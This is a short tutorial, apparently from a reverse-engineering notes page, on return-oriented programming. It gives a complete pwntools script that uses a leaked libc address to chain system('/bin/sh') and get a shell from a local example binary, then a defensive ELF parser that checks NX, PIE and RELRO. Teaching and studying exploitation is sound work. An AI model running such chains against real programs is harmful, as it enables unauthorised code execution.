Binary Exploitation with ROP

Last modified: 2023-02-12

Reverse Engineering

ROP (Return-Oriented Programming) is a technique used to bypass security mechanisms such as data execution prevention (DEP) and, when combined with an address leak, address space layout randomization (ASLR). It allows us to achieve arbitrary code execution by chaining together small, existing code snippets (called "gadgets") that already live in the program or its libraries, rather than injecting new malicious code.

Exploitation

Pwntools can build ROP chains for us, so we'll use it for exploitation. The example binary prints the address of libc's system() after its prompt, which is what lets us locate libc despite ASLR.

from pwn import *

elf = context.binary = ELF('./example')
libc = elf.libc
p = process()

# read the leaked address of system() that the binary prints after the prompt
p.recvuntil(b'Enter name: ')
leaked_system = int(p.recvline().strip(), 16)

# derive the libc base: leaked address minus the offset of system() inside libc
libc.address = leaked_system - libc.sym['system']
log.success('LIBC base: {}'.format(hex(libc.address)))

# get the address of a "/bin/sh" string inside libc
binsh = next(libc.search(b'/bin/sh'))

# build the rop chain: 32 bytes of padding up to the saved return address, then system("/bin/sh")
rop = ROP(libc)
rop.raw(b'A' * 32)
rop.system(binsh)

# send our rop chain
p.sendline(rop.chain())

# get the shell
p.interactive()
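A companion check from the defender's side, added here and not part of the original write-up: a minimal ELF64 program-header parser that reports whether a binary declares NX (a PT_GNU_STACK header without the PF_X bit), PIE (ET_DYN) and RELRO, the mitigations the chain above is built to get around. It uses only the standard library, and build_sample() constructs a header-only ELF image so it runs offline; on a real binary, read the file bytes and pass them to mitigations().

```python
import struct

# ELF constants (from the ELF specification / Linux binfmt_elf)
ET_DYN = 3                  # shared object: PIE executables carry this type
PT_GNU_STACK = 0x6474e551   # declares stack permissions; no PF_X bit means NX is requested
PT_GNU_RELRO = 0x6474e552   # region made read-only after relocation (RELRO)
PF_X = 0x1

def mitigations(image: bytes) -> dict:
    """Report PIE / NX / RELRO for a little-endian ELF64 image given as bytes."""
    if image[:4] != b"\x7fELF" or image[4] != 2 or image[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_type = struct.unpack_from("<H", image, 16)[0]
    e_phoff = struct.unpack_from("<Q", image, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 54)
    # same convention as checksec-style tools: no PT_GNU_STACK header means no NX guarantee
    nx, relro = False, False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", image, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}

def build_sample(e_type: int, phdrs: list) -> bytes:
    """Constructed header-only ELF64 image (no code) for offline testing; phdrs = [(p_type, p_flags), ...]."""
    ehdr = bytearray(64)
    ehdr[:7] = b"\x7fELF\x02\x01\x01"                       # magic, ELFCLASS64, little-endian, EV_CURRENT
    struct.pack_into("<HHI", ehdr, 16, e_type, 62, 1)       # e_type, e_machine = x86-64, e_version
    struct.pack_into("<Q", ehdr, 32, 64)                    # e_phoff: program headers follow the header
    struct.pack_into("<HHH", ehdr, 52, 64, 56, len(phdrs))  # e_ehsize, e_phentsize, e_phnum
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return bytes(ehdr) + body

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample(ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])
    print(mitigations(data))
```

A binary that reports nx=False would not even need ROP, since injected shellcode on the stack would run directly; the result of this check is what decides whether a chain like the one above is the attacker's only route.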